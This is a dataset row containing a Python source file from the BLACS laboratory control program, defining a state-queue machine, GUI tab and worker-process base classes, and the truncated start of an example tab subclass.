source
stringlengths
3
86
python
stringlengths
75
1.04M
tab_base_classes.py
##################################################################### # # # /tab_base_classes.py # # # # Copyright 2013, Monash University # # # # This file is part of the program BLACS, in the labscript suite # # (see http://labscriptsuite.org), and is licensed under the # # Simplified BSD License. See the license.txt file in the root of # # the project for the full license. # # # ##################################################################### from zprocess import Process, Interruptor, Interrupted import time import sys import threading import traceback import logging import warnings import queue import pickle from html import escape import os from types import GeneratorType from bisect import insort from qtutils.qt.QtCore import * from qtutils.qt.QtGui import * from qtutils.qt.QtWidgets import * from qtutils import * from labscript_utils.qtwidgets.outputbox import OutputBox import qtutils.icons from labscript_utils.qtwidgets.elide_label import elide_label from labscript_utils.ls_zprocess import ProcessTree, RemoteProcessClient from labscript_utils.shared_drive import path_to_local from blacs import BLACS_DIR process_tree = ProcessTree.instance() from labscript_utils import dedent class Counter(object): """A class with a single method that returns a different integer each time it's called.""" def __init__(self): self.i = 0 def get(self): self.i += 1 return self.i MODE_MANUAL = 1 MODE_TRANSITION_TO_BUFFERED = 2 MODE_TRANSITION_TO_MANUAL = 4 MODE_BUFFERED = 8 class StateQueue(object): # NOTE: # # It is theoretically possible to remove the dependency on the Qt Mainloop (remove inmain decorators and fnuction calls) # by introducing a local lock object instead. However, be aware that right now, the Qt inmain lock is preventing the # statemachine loop (Tab.mainloop) from getting any states uot of the queue until after the entire tab is initialised # and the Qt mainloop starts. # # This is particularly important because we exploit this behaviour to make sure that Tab._initialise_worker is placed at the # start of the StateQueue, and so the Tab.mainloop method is guaranteed to get this initialisation method as the first state # regardless of whether the mainloop is started before the state is inserted (the state should always be inserted as part of # the call to Tab.create_worker, in DeviceTab.initialise_workers in DeviceTab.__init__ ) # def __init__(self,device_name): self.logger = logging.getLogger('BLACS.%s.state_queue'%(device_name)) self.logging_enabled = False if self.logging_enabled: self.logger.debug("started") self.list_of_states = [] self._last_requested_state = None # A queue that blocks the get(requested_state) method until an entry in the queue has a state that matches the requested_state self.get_blocking_queue = queue.Queue() @property @inmain_decorator(True) # This is always done in main so that we avoid a race condition between the get method and # the put method accessing this property def last_requested_state(self): return self._last_requested_state @last_requested_state.setter @inmain_decorator(True) def last_requested_state(self, value): self._last_requested_state = value def log_current_states(self): if self.logging_enabled: self.logger.debug('Current items in the state queue: %s'%str(self.list_of_states)) # this should only happen in the main thread, as my implementation is not thread safe! @inmain_decorator(True) def put(self, allowed_states, queue_state_indefinitely, delete_stale_states, data, priority=0): """Add a state to the queue. Lower number for priority indicates the state will be executed before any states with higher numbers for their priority""" # State data starts with priority, and then with a unique id that monotonically # increases. This way, sorting the queue will sort first by priority and then by # order added. state_data = [priority, get_unique_id(), allowed_states, queue_state_indefinitely, delete_stale_states,data] # Insert the task into the queue, retaining sort order first by priority and then by order added: insort(self.list_of_states, state_data) # if this state is one the get command is waiting for, notify it! if self.last_requested_state is not None and allowed_states&self.last_requested_state: self.get_blocking_queue.put('new item') if self.logging_enabled: if not isinstance(data[0],str): self.logger.debug('New state queued up. Allowed modes: %d, queue state indefinitely: %s, delete stale states: %s, function: %s'%(allowed_states,str(queue_state_indefinitely),str(delete_stale_states),data[0].__name__)) self.log_current_states() # this should only happen in the main thread, as my implementation is not thread safe! @inmain_decorator(True) def check_for_next_item(self,state): # We reset the queue here, as we are about to traverse the tree, which contains any new items that # are described in messages in this queue, so let's not keep those messages around anymore. # Put another way, we want to block until a new item is added, if we don't find an item in this function # So it's best if the queue is empty now! if self.logging_enabled: self.logger.debug('Re-initialsing self._get_blocking_queue') self.get_blocking_queue = queue.Queue() # traverse the list delete_index_list = [] success = False for i,item in enumerate(self.list_of_states): priority, unique_id, allowed_states, queue_state_indefinitely, delete_stale_states, data = item if self.logging_enabled: self.logger.debug('iterating over states in queue') if allowed_states&state: # We have found one! Remove it from the list delete_index_list.append(i) if self.logging_enabled: self.logger.debug('requested state found in queue') # If we are to delete stale states, see if the next state is the same statefunction. # If it is, use that one, or whichever is the latest entry without encountering a different statefunction, # and delete the rest if delete_stale_states: state_function = data[0] i+=1 while i < len(self.list_of_states) and state_function == self.list_of_states[i][5][0]: if self.logging_enabled: self.logger.debug('requesting deletion of stale state') priority, unique_id, allowed_states, queue_state_indefinitely, delete_stale_states, data = self.list_of_states[i] delete_index_list.append(i) i+=1 success = True break elif not queue_state_indefinitely: if self.logging_enabled: self.logger.debug('state should not be queued indefinitely') delete_index_list.append(i) # do this in reverse order so that the first delete operation doesn't mess up the indices of subsequent ones for index in reversed(sorted(delete_index_list)): if self.logging_enabled: self.logger.debug('deleting state') del self.list_of_states[index] if not success: data = None return success,data # this method should not be called in the main thread, because it will block until something is found... # Please, only have one thread ever accessing this...I have no idea how it will behave if multiple threads are trying to get # items from the queue... # # This method will block until a item found in the queue is found to be allowed during the specified 'state'. def get(self,state): if self.last_requested_state: raise Exception('You have multiple threads trying to get from this queue at the same time. I won\'t allow it!') self.last_requested_state = state while True: if self.logging_enabled: self.logger.debug('requesting next item in queue with mode %d'%state) inmain(self.log_current_states) status,data = self.check_for_next_item(state) if not status: # we didn't find anything useful, so we'll wait until a useful state is added! self.get_blocking_queue.get() else: self.last_requested_state = None return data # A counter for uniqely numbering timeouts and numbering queued states monotinically, # such that sort order coresponds to the order the state was added to the queue: get_unique_id = Counter().get def define_state(allowed_modes,queue_state_indefinitely,delete_stale_states=False): def wrap(function): unescaped_name = function.__name__ escapedname = '_' + function.__name__ if allowed_modes < 1 or allowed_modes > 15: raise RuntimeError('Function %s has been set to run in unknown states. Please make sure allowed states is one or more of MODE_MANUAL,'%unescaped_name+ 'MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL and MODE_BUFFERED (or-ed together using the | symbol, eg MODE_MANUAL|MODE_BUFFERED') def f(self,*args,**kwargs): function.__name__ = escapedname #setattr(self,escapedname,function) self.event_queue.put(allowed_modes,queue_state_indefinitely,delete_stale_states,[function,[args,kwargs]]) f.__name__ = unescaped_name f._allowed_modes = allowed_modes return f return wrap class Tab(object): ICON_OK = ':/qtutils/fugue/tick' ICON_BUSY = ':/qtutils/fugue/hourglass' ICON_ERROR = ':/qtutils/fugue/exclamation' ICON_FATAL_ERROR = ':/qtutils/fugue/exclamation-red' def __init__(self,notebook,settings,restart=False): # Store important parameters self.notebook = notebook self.settings = settings self._device_name = self.settings["device_name"] # Setup logging self.logger = logging.getLogger('BLACS.%s'%(self.device_name)) self.logger.debug('Started') # Setup the timer for updating that tab text label when the tab is not # actively part of a notebook self._tab_icon_and_colour_timer = QTimer() self._tab_icon_and_colour_timer.timeout.connect(self.set_tab_icon_and_colour) self._tab_icon = self.ICON_OK self._tab_text_colour = 'black' # Create instance variables self._not_responding_error_message = '' self._error = '' self._state = '' self._time_of_last_state_change = time.time() self.not_responding_for = 0 self.hide_not_responding_error_until = 0 self._timeouts = set() self._timeout_ids = {} self._force_full_buffered_reprogram = True self.event_queue = StateQueue(self.device_name) self.workers = {} self._supports_smart_programming = False self._restart_receiver = [] self.shutdown_workers_complete = False self.remote_process_client = self._get_remote_configuration() self.BLACS_connection = self.settings['connection_table'].find_by_name(self.device_name).BLACS_connection # Load the UI self._ui = UiLoader().load(os.path.join(BLACS_DIR, 'tab_frame.ui')) self._layout = self._ui.device_layout self._device_widget = self._ui.device_controls self._changed_widget = self._ui.changed_widget self._changed_layout = self._ui.changed_layout self._changed_widget.hide() conn_str = self.BLACS_connection if self.remote_process_client is not None: conn_str += " via %s:%d" % (self.remote_process_client.host, self.remote_process_client.port) self._ui.device_name.setText( "<b>%s</b> [conn: %s]" % (str(self.device_name), conn_str) ) elide_label(self._ui.device_name, self._ui.horizontalLayout, Qt.ElideRight) elide_label(self._ui.state_label, self._ui.state_label_layout, Qt.ElideRight) # Insert an OutputBox into the splitter, initially hidden: self._output_box = OutputBox(self._ui.splitter) self._ui.splitter.setCollapsible(self._ui.splitter.count() - 2, True) self._output_box.output_textedit.hide() # connect signals self._ui.button_clear_smart_programming.clicked.connect(self.on_force_full_buffered_reprogram) self._ui.button_clear_smart_programming.setEnabled(False) self.force_full_buffered_reprogram = True self._ui.button_show_terminal.toggled.connect(self.set_terminal_visible) self._ui.button_close.clicked.connect(self.hide_error) self._ui.button_restart.clicked.connect(self.restart) self._update_error_and_tab_icon() self.supports_smart_programming(False) # Restore settings: self.restore_builtin_save_data(self.settings.get('saved_data', {})) # This should be done beofre the main_loop starts or else there is a race condition as to whether the # self._mode variable is even defined! # However it must be done after the UI is created! self.mode = MODE_MANUAL self.state = 'idle' # Setup the not responding timeout self._timeout = QTimer() self._timeout.timeout.connect(self.check_time) self._timeout.start(1000) # Launch the mainloop self._mainloop_thread = threading.Thread(target = self.mainloop) self._mainloop_thread.daemon = True self._mainloop_thread.start() # Add the tab to the notebook self.notebook.addTab(self._ui,self.device_name) self._ui.show() def _get_remote_configuration(self): # Create and return zprocess remote process client, if the device is configured # as a remote device, else None: PRIMARY_BLACS = '__PrimaryBLACS' table = self.settings['connection_table'] properties = table.find_by_name(self.device_name).properties if properties.get('gui', PRIMARY_BLACS) != PRIMARY_BLACS: msg = "Remote BLACS GUIs not yet supported by BLACS" raise NotImplementedError(msg) remote_server_name = properties.get('worker', PRIMARY_BLACS) if remote_server_name != PRIMARY_BLACS: remote_server_device = table.find_by_name(remote_server_name) if remote_server_device.parent.name != PRIMARY_BLACS: msg = "Multi-hop remote workers not yet supported by BLACS" raise NotImplementedError(msg) remote_host, remote_port = remote_server_device.parent_port.split(':') remote_port = int(remote_port) return RemoteProcessClient(remote_host, remote_port) return None def get_builtin_save_data(self): """Get builtin settings to be restored like whether the terminal is visible. Not to be overridden.""" return {'_terminal_visible': self._ui.button_show_terminal.isChecked(), '_splitter_sizes': self._ui.splitter.sizes()} def get_all_save_data(self): save_data = self.get_builtin_save_data() if hasattr(self, 'get_save_data'): tab_save_data = self.get_save_data() if isinstance(tab_save_data, dict): save_data.update(tab_save_data) else: self.logger.warning('Incorrect format for tab save data from the get_save_data() method. Data should be a dict. Data was: %s'%tab_save_data) return save_data def restore_builtin_save_data(self, data): """Restore builtin settings to be restored like whether the terminal is visible. Not to be overridden.""" self.set_terminal_visible(data.get('_terminal_visible', False)) if '_splitter_sizes' in data: self._ui.splitter.setSizes(data['_splitter_sizes']) def update_from_settings(self, settings): self.restore_builtin_save_data(settings['saved_data']) def supports_smart_programming(self,support): self._supports_smart_programming = bool(support) if self._supports_smart_programming: self._ui.button_clear_smart_programming.show() else: self._ui.button_clear_smart_programming.hide() def on_force_full_buffered_reprogram(self): self.force_full_buffered_reprogram = True @property def force_full_buffered_reprogram(self): return self._force_full_buffered_reprogram @force_full_buffered_reprogram.setter def force_full_buffered_reprogram(self,value): self._force_full_buffered_reprogram = bool(value) self._ui.button_clear_smart_programming.setEnabled(not bool(value)) @property @inmain_decorator(True) def error_message(self): return self._error @error_message.setter @inmain_decorator(True) def error_message(self,message): #print message #print self._error if message != self._error: self._error = message self._update_error_and_tab_icon() @inmain_decorator(True) def _update_error_and_tab_icon(self): """Udate and show the error message for the tab, and update the icon and text colour on the tab""" prefix = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:"MS Shell Dlg 2"; font-size:7.8pt; font-weight:400; font-style:normal;">' suffix = '</body></html>' #print threading.current_thread().name self._ui.error_message.setHtml(prefix+self._not_responding_error_message+self._error+suffix) if self._error or self._not_responding_error_message: self._ui.notresponding.show() self._tab_text_colour = 'red' if self.error_message: if self.state == 'fatal error': self._tab_icon = self.ICON_FATAL_ERROR else: self._tab_icon = self.ICON_ERROR else: self._ui.notresponding.hide() self._tab_text_colour = 'black' if self.state == 'idle': self._tab_icon = self.ICON_OK else: self._tab_icon = self.ICON_BUSY self.set_tab_icon_and_colour() @inmain_decorator(True) def set_tab_icon_and_colour(self): """Set the tab icon and the colour of its text to the values of self._tab_icon and self._tab_text_colour respectively""" if self._ui.parentWidget() is None: return self.notebook = self._ui.parentWidget().parentWidget() if self.notebook is not None: currentpage = self.notebook.indexOf(self._ui) if currentpage == -1: # shutting down: return icon = QIcon(self._tab_icon) self.notebook.tabBar().setTabIcon(currentpage, icon) self.notebook.tabBar().setTabTextColor(currentpage, QColor(self._tab_text_colour)) def get_tab_layout(self): return self._layout @property def device_name(self): return self._device_name # sets the mode, switches between MANUAL, BUFFERED, TRANSITION_TO_BUFFERED and TRANSITION_TO_STATIC @property def mode(self): return self._mode @mode.setter def mode(self,mode): self._mode = mode self._update_state_label() @property def state(self): return self._state @state.setter def state(self,state): self._state = state self._time_of_last_state_change = time.time() self._update_state_label() self._update_error_and_tab_icon() @inmain_decorator(True) def _update_state_label(self): if self.mode == 1: mode = 'Manual' elif self.mode == 2: mode = 'Transitioning to buffered' elif self.mode == 4: mode = 'Transitioning to manual' elif self.mode == 8: mode = 'Buffered' else: raise RuntimeError('self.mode for device %s is invalid. It must be one of MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL or MODE_BUFFERED'%(self.device_name)) self._ui.state_label.setText('<b>%s mode</b> - State: %s'%(mode,self.state)) # Todo: Update icon in tab def create_worker(self,name,WorkerClass,workerargs=None): """Set up a worker process. WorkerClass can either be a subclass of Worker, or a string containing a fully qualified import path to a worker. The latter is useful if the worker class is in a separate file with global imports or other import-time behaviour that is undesirable to have run in the main process, for example if the imports may not be available to the main process (as may be the case once remote worker processes are implemented and the worker may be on a separate computer). The worker process will not be started immediately, it will be started once the state machine mainloop begins running. This way errors in startup will be handled using the normal state machine machinery.""" if workerargs is None: workerargs = {} # Add all connection table properties, if they were not already specified in # workerargs: conntable = self.settings['connection_table'] for key, value in conntable.find_by_name(self.device_name).properties.items(): workerargs.setdefault(key, value) workerargs['is_remote'] = self.remote_process_client is not None if name in self.workers: raise Exception('There is already a worker process with name: %s'%name) if name == 'GUI': # This is here so that we can display "(GUI)" in the status bar and have the user confident this is actually happening in the GUI, # not in a worker process named GUI raise Exception('You cannot call a worker process "GUI". Why would you want to? Your worker process cannot interact with the BLACS GUI directly, so you are just trying to confuse yourself!') if isinstance(WorkerClass, type): worker = WorkerClass( process_tree, output_redirection_port=self._output_box.port, remote_process_client=self.remote_process_client, startup_timeout=30 ) elif isinstance(WorkerClass, str): # If we were passed a string for the WorkerClass, it is an import path # for where the Worker class can be found. Pass it to zprocess.Process, # which will do the import in the subprocess only. worker = Process( process_tree, output_redirection_port=self._output_box.port, remote_process_client=self.remote_process_client, startup_timeout=30, subclass_fullname=WorkerClass ) else: raise TypeError(WorkerClass) self.workers[name] = (worker,None,None) self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,[Tab._initialise_worker,[(name, workerargs),{}]], priority=-1) def _initialise_worker(self, worker_name, workerargs): yield (self.queue_work(worker_name, 'init', worker_name, self.device_name, workerargs)) if self.error_message: raise Exception('Device failed to initialise') @define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True) def _timeout_add(self,delay,execute_timeout): QTimer.singleShot(delay,execute_timeout) def statemachine_timeout_add(self,delay,statefunction,*args,**kwargs): # Add the timeout to our set of registered timeouts. Timeouts # can thus be removed by the user at ay time by calling # self.timeouts.remove(function) self._timeouts.add(statefunction) # Here's a function which executes the timeout once, then queues # itself up again after a delay: def execute_timeout(): # queue up the state function, but only if it hasn't been # removed from self.timeouts: if statefunction in self._timeouts and self._timeout_ids[statefunction] == unique_id: # Only queue up the state if we are in an allowed mode if statefunction._allowed_modes&self.mode: statefunction(*args, **kwargs) # queue up another call to this function (execute_timeout) # after the delay time: self._timeout_add(delay,execute_timeout) # Store a unique ID for this timeout so that we don't confuse # other timeouts for this one when checking to see that this # timeout hasn't been removed: unique_id = get_unique_id() self._timeout_ids[statefunction] = unique_id # queue the first run: #QTimer.singleShot(delay,execute_timeout) execute_timeout() # Returns True if the timeout was removed def statemachine_timeout_remove(self,statefunction): if statefunction in self._timeouts: self._timeouts.remove(statefunction) return True return False # returns True if at least one timeout was removed, else returns False def statemachine_timeout_remove_all(self): # As a consistency check, we overwrite self._timeouts to an empty set always # This must be done after the check to see if it is empty (if self._timeouts) so do not refactor this code! if self._timeouts: self._timeouts = set() return True else: self._timeouts = set() return False @define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True) def shutdown_workers(self): """Ask all workers to shutdown""" for worker_name in self.workers: yield(self.queue_work(worker_name, 'shutdown')) self.shutdown_workers_complete = True def close_tab(self, finalise=True): """Close the tab, terminate subprocesses and join the mainloop thread. If finalise=False, then do not terminate subprocesses or join the mainloop. In this case, callers must manually call finalise_close_tab() to perform these potentially blocking operations""" self.logger.info('close_tab called') self._timeout.stop() for worker, to_worker, from_worker in self.workers.values(): # If the worker is still starting up, interrupt any blocking operations: worker.interrupt_startup() # Interrupt the read and write queues in case the mainloop is blocking on # sending or receiving from them: if to_worker is not None: to_worker.interrupt() from_worker.interrupt() # In case the mainloop is blocking on the event queue, post a message to that # queue telling it to quit: if self._mainloop_thread.is_alive(): self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,['_quit',None],priority=-1) self.notebook = self._ui.parentWidget().parentWidget() currentpage = None if self.notebook: #currentpage = self.notebook.get_current_page() currentpage = self.notebook.indexOf(self._ui) self.notebook.removeTab(currentpage) temp_widget = QLabel("Waiting for tab mainloop and worker(s) to exit") temp_widget.setAlignment(Qt.AlignCenter) self.notebook.insertTab(currentpage, temp_widget, '[%s]' % self.device_name) self.notebook.tabBar().setTabIcon(currentpage, QIcon(self.ICON_BUSY)) self.notebook.tabBar().setTabTextColor(currentpage, QColor('grey')) self.notebook.setCurrentWidget(temp_widget) if finalise: self.finalise_close_tab(currentpage) return currentpage def finalise_close_tab(self, currentpage): TERMINATE_TIMEOUT = 2 self._mainloop_thread.join(TERMINATE_TIMEOUT) if self._mainloop_thread.is_alive(): self.logger.warning("mainloop thread of %s did not stop", self.device_name) kwargs = {'wait_timeout': TERMINATE_TIMEOUT} # timeout passed to .wait() if self.remote_process_client is not None: # Set up a zprocess.Interruptor to interrupt communication with the remote # process server if the timeout is reached: interruptor = Interruptor() kwargs['get_interruptor'] = interruptor timer = inmain(QTimer) inmain(timer.singleShot, int(TERMINATE_TIMEOUT * 1000), interruptor.set) try: # Delete the workers from the dict as we go, ensuring their __del__ method # will be called. This is important so that the remote process server, if # any, knows we have deleted the object: for name in self.workers.copy(): worker, _, _ = self.workers.pop(name) worker.terminate(**kwargs) except Interrupted: self.logger.warning( "Terminating workers of %s timed out", self.device_name ) return finally: # Shutdown the output box by joining its thread: self._output_box.shutdown() if self.remote_process_client is not None: inmain(timer.stop) def connect_restart_receiver(self,function): if function not in self._restart_receiver: self._restart_receiver.append(function) def disconnect_restart_receiver(self,function): if function in self._restart_receiver: self._restart_receiver.remove(function) def restart(self,*args): # notify all connected receivers: for f in self._restart_receiver: try: f(self.device_name) except Exception: self.logger.exception('Could not notify a connected receiver function') currentpage = self.close_tab(finalise=False) self.logger.info('***RESTART***') self.settings['saved_data'] = self.get_all_save_data() self._restart_thread = inthread(self.continue_restart, currentpage) def continue_restart(self, currentpage): """Called in a thread for the stages of restarting that may be blocking, so as to not block the main thread. Calls subsequent GUI operations in the main thread once finished blocking.""" self.finalise_close_tab(currentpage) inmain(self.clean_ui_on_restart) inmain(self.finalise_restart, currentpage) def clean_ui_on_restart(self): # Clean up UI ui = self._ui self._ui = None ui.setParent(None) ui.deleteLater() del ui def finalise_restart(self, currentpage): widget = self.notebook.widget(currentpage) widget.setParent(None) widget.deleteLater() del widget # Note: the following function call will break if the user hasn't # overridden the __init__ function to take these arguments. So # make sure you do that! self.__init__(self.notebook, self.settings,restart=True) # The init method is going to place this device tab at the end of the notebook specified # Let's remove it from there, and place it the poition it used to be! self.notebook = self._ui.parentWidget().parentWidget() self.notebook.removeTab(self.notebook.indexOf(self._ui)) self.notebook.insertTab(currentpage,self._ui,self.device_name) self.notebook.setCurrentWidget(self._ui) # If BLACS is waiting on this tab for something, tell it to abort! # self.BLACS.current_queue.put('abort') def queue_work(self,worker_process,worker_function,*args,**kwargs): return worker_process,worker_function,args,kwargs def set_terminal_visible(self, visible): if visible: self._output_box.output_textedit.show() else: self._output_box.output_textedit.hide() self._ui.button_show_terminal.setChecked(visible) def hide_error(self): # dont show the error again until the not responding time has doubled: self.hide_not_responding_error_until = 2*self.not_responding_for self._ui.notresponding.hide() self.error_message = '' self._tab_text_colour = 'black' self.set_tab_icon_and_colour() def check_time(self): if self.state in ['idle','fatal error']: self.not_responding_for = 0 if self._not_responding_error_message: self._not_responding_error_message = '' self._update_error_and_tab_icon() else: self.not_responding_for = time.time() - self._time_of_last_state_change if self.not_responding_for > 5 + self.hide_not_responding_error_until: self.hide_not_responding_error_for = 0 self._ui.notresponding.show() hours, remainder = divmod(int(self.not_responding_for), 3600) minutes, seconds = divmod(remainder, 60) if hours: s = '%s hours'%hours elif minutes: s = '%s minutes'%minutes else: s = '%s seconds'%seconds self._not_responding_error_message = 'The hardware process has not responded for %s.<br /><br />'%s self._update_error_and_tab_icon() return True def mainloop(self): logger = logging.getLogger('BLACS.%s.mainloop'%(self.settings['device_name'])) logger.debug('Starting') # Store a reference to the state queue and workers, this way if the tab is restarted, we won't ever get access to the new state queue created then event_queue = self.event_queue workers = self.workers try: while True: # Get the next task from the event queue: logger.debug('Waiting for next event') func, data = event_queue.get(self.mode) if func == '_quit': # The user has requested a restart: logger.debug('Received quit signal') break args,kwargs = data logger.debug('Processing event %s' % func.__name__) self.state = '%s (GUI)'%func.__name__ # Run the task with the GUI lock, catching any exceptions: #func = getattr(self,funcname) # run the function in the Qt main thread generator = inmain(func,self,*args,**kwargs) # Do any work that was queued up:(we only talk to the worker if work has been queued up through the yield command) if type(generator) == GeneratorType: # We need to call next recursively, queue up work and send the results back until we get a StopIteration exception generator_running = True # get the data from the first yield function worker_process,worker_function,worker_args,worker_kwargs = inmain(generator.__next__) # Continue until we get a StopIteration exception, or the user requests a restart while generator_running: try: logger.debug('Instructing worker %s to do job %s'%(worker_process,worker_function) ) if worker_function == 'init': # Start the worker process before running its init() method: self.state = '%s (%s)'%('Starting worker process', worker_process) worker, _, _ = self.workers[worker_process] to_worker, from_worker = worker.start(*worker_args) self.workers[worker_process] = (worker, to_worker, from_worker) worker_args = () del worker # Do not gold a reference indefinitely worker_arg_list = (worker_function,worker_args,worker_kwargs) # This line is to catch if you try to pass unpickleable objects. try: pickle.dumps(worker_arg_list) except Exception: self.error_message += 'Attempt to pass unserialisable object to child process:' raise # Send the command to the worker to_worker = workers[worker_process][1] from_worker = workers[worker_process][2] to_worker.put(worker_arg_list) self.state = '%s (%s)'%(worker_function,worker_process) # Confirm that the worker got the message: logger.debug('Waiting for worker to acknowledge job request') success, message, results = from_worker.get() if not success: logger.info('Worker reported failure to start job') raise Exception(message) # Wait for and get the results of the work: logger.debug('Worker reported job started, waiting for completion') success,message,results = from_worker.get() if not success: logger.info('Worker reported exception during job') now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime()) self.error_message += ('Exception in worker - %s:<br />' % now + '<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%escape(message).replace(' ','&nbsp;').replace('\n','<br />')) else: logger.debug('Job completed') # Reset the hide_not_responding_error_until, since we have now heard from the child self.hide_not_responding_error_until = 0 # Send the results back to the GUI function logger.debug('returning worker results to function %s' % func.__name__) self.state = '%s (GUI)'%func.__name__ next_yield = inmain(generator.send,results) # If there is another yield command, put the data in the required variables for the next loop iteration if next_yield: worker_process,worker_function,worker_args,worker_kwargs = next_yield except StopIteration: # The generator has finished. Ignore the error, but stop the loop logger.debug('Finalising function') generator_running = False self.state = 'idle' except Interrupted: # User requested a restart logger.debug('Interrupted by tab restart, quitting mainloop') return except Exception: # Some unhandled error happened. Inform the user, and give the option to restart message = traceback.format_exc() logger.critical('A fatal exception happened:\n %s'%message) now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime()) self.error_message += ('Fatal exception in main process - %s:<br /> '%now + '<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%escape(message).replace(' ','&nbsp;').replace('\n','<br />')) self.state = 'fatal error' # do this in the main thread inmain(self._ui.button_close.setEnabled,False) logger.info('Exiting') class Worker(Process): def init(self): # To be overridden by subclasses pass def run(self, worker_name, device_name, extraargs): self.worker_name = worker_name self.device_name = device_name from labscript_utils.setup_logging import setup_logging setup_logging('BLACS') log_name = 'BLACS.%s_%s.worker'%(self.device_name,self.worker_name) self.logger = logging.getLogger(log_name) self.logger.debug('Starting') import labscript_utils.excepthook labscript_utils.excepthook.set_logger(self.logger) from labscript_utils.ls_zprocess import ProcessTree process_tree = ProcessTree.instance() import labscript_utils.h5_lock process_tree.zlock_client.set_process_name(log_name) for name, value in extraargs.items(): if hasattr(self, name): msg = """attribute `{}` overwrites an attribute of the Worker base class with the same name. This may cause unexpected behaviour. Consider renaming it.""" warnings.warn(dedent(msg).format(name), RuntimeWarning) else: setattr(self, name, value) self.mainloop() def _transition_to_buffered(self, device_name, h5_file, front_panel_values, fresh): # The h5_file arg was converted to network-agnostic before being sent to us. # Convert it to a local path before calling the subclass's # transition_to_buffered() method h5_file = path_to_local(h5_file) return self.transition_to_buffered( device_name, h5_file, front_panel_values, fresh ) def mainloop(self): while True: # Get the next task to be done: self.logger.debug('Waiting for next job request') funcname, args, kwargs = self.from_parent.get() self.logger.debug('Got job request %s' % funcname) try: # See if we have a method with that name: func = getattr(self,funcname) success = True message = '' except AttributeError: success = False message = traceback.format_exc() self.logger.error('Couldn\'t start job:\n %s'%message) # Report to the parent whether method lookup was successful or not: self.to_parent.put((success,message,None)) if success: # Try to do the requested work: self.logger.debug('Starting job %s'%funcname) try: results = func(*args,**kwargs) success = True message = '' self.logger.debug('Job complete') except Exception: results = None success = False traceback_lines = traceback.format_exception(*sys.exc_info()) del traceback_lines[1] message = ''.join(traceback_lines) self.logger.error('Exception in job:\n%s'%message) # Check if results object is serialisable: try: pickle.dumps(results) except Exception: message = traceback.format_exc() self.logger.error('Job returned unserialisable datatypes, cannot pass them back to parent.\n' + message) message = 'Attempt to pass unserialisable object %s to parent process:\n' % str(results) + message success = False results = None # Report to the parent whether work was successful or not, # and what the results were: self.to_parent.put((success,message,results)) class PluginTab(object): def __init__(self, notebook, settings): # Store important parameters self.notebook = notebook self.settings = settings self._tab_name = self.settings["tab_name"] # Load the UI self._ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'plugin_tab_frame.ui')) self._layout = self._ui.device_layout self._ui.device_name.setText("<b>%s</b> [Plugin]" % (str(self.tab_name))) elide_label(self._ui.device_name, self._ui.horizontalLayout, Qt.ElideRight) # Add the tab to the notebook self.notebook.addTab(self._ui, self.tab_name) self._ui.show() # Call the initialise GUI function self.initialise_GUI() self.restore_save_data(self.settings['saved_data'] if 'saved_data' in self.settings else {}) @inmain_decorator(True) def set_tab_icon_and_colour(self): """Set the tab icon and the colour of its text to the values of self._tab_icon and self._tab_text_colour respectively""" if self._ui.parentWidget() is None: return self.notebook = self._ui.parentWidget().parentWidget() if self.notebook is not None: currentpage = self.notebook.indexOf(self._ui) if currentpage == -1: # shutting down: return icon = QIcon(self._tab_icon) self.notebook.tabBar().setTabIcon(currentpage, icon) self.notebook.tabBar().setTabTextColor(currentpage, QColor(self._tab_text_colour)) @property def tab_name(self): return self._tab_name def get_tab_layout(self): return self._layout def close_tab(self, **kwargs): self.notebook = self._ui.parentWidget().parentWidget() currentpage = None if self.notebook: #currentpage = self.notebook.get_current_page() currentpage = self.notebook.indexOf(self._ui) self.notebook.removeTab(currentpage) temp_widget = QWidget() self.notebook.insertTab(currentpage, temp_widget, self.tab_name) self.notebook.setCurrentWidget(temp_widget) return currentpage def initialise_GUI(self): return # This method should be overridden in your plugin class if you want to save any data # This method should return a dictionary, and this dictionary will be passed to the restore_save_data() # method when the tab is initialised def get_save_data(self): return {} def get_all_save_data(self): save_data = self.get_builtin_save_data() if hasattr(self, 'get_save_data'): tab_save_data = self.get_save_data() if isinstance(tab_save_data, dict): save_data.update(tab_save_data) return save_data # This method should be overridden in your plugin class if you want to restore data # (saved by get_save_data()) when the tab is initialised. # You will be passed a dictionary of the form specified by your get_save_data() method # # Note: You must handle the case where the data dictionary is empty (or one or more keys are missing) # This case will occur the first time BLACS is started on a PC, or if the BLACS datastore is destroyed def restore_save_data(self,data): return def update_from_settings(self,settings): self.restore_save_data(settings['saved_data']) def get_builtin_save_data(self): return {} # Example code! Two classes are defined below, which are subclasses # of the ones defined above. They show how to make a Tab class, # and a Worker class, and get the Tab to request work to be done by # the worker in response to GUI events. class MyTab(Tab): def __init__(self,notebook,settings,restart=False): # restart will be true if __init__ was called due to a restart Tab.__init__(self,notebook,settings,restart) # Make sure to call this first in your __init__! self.create_worker('My worker',MyWorker,{'x':7}) self.initUI() def initUI(self): self.layout = self.get_tab_layout() foobutton = QPushButton('foo, 10 seconds!') barbutton = QPushButton('bar, 10 seconds, then error!') bazbutton = QPushButton('baz, 0.5 seconds!') addbazbutton = QPushButton('add 2 second timeout to baz') removebazbutton = QPushButton('remove baz timeout') bazunpickleable= QPushButton('try to pass baz a threading.Lock()') fatalbutton = QPushButton('fatal error, forgot to add @define_state to callback!') self.checkbutton = QPushButton('have baz\nreturn a Queue') self.checkbutton.setCheckable(True) #self.device_widget.addWidget(layout) 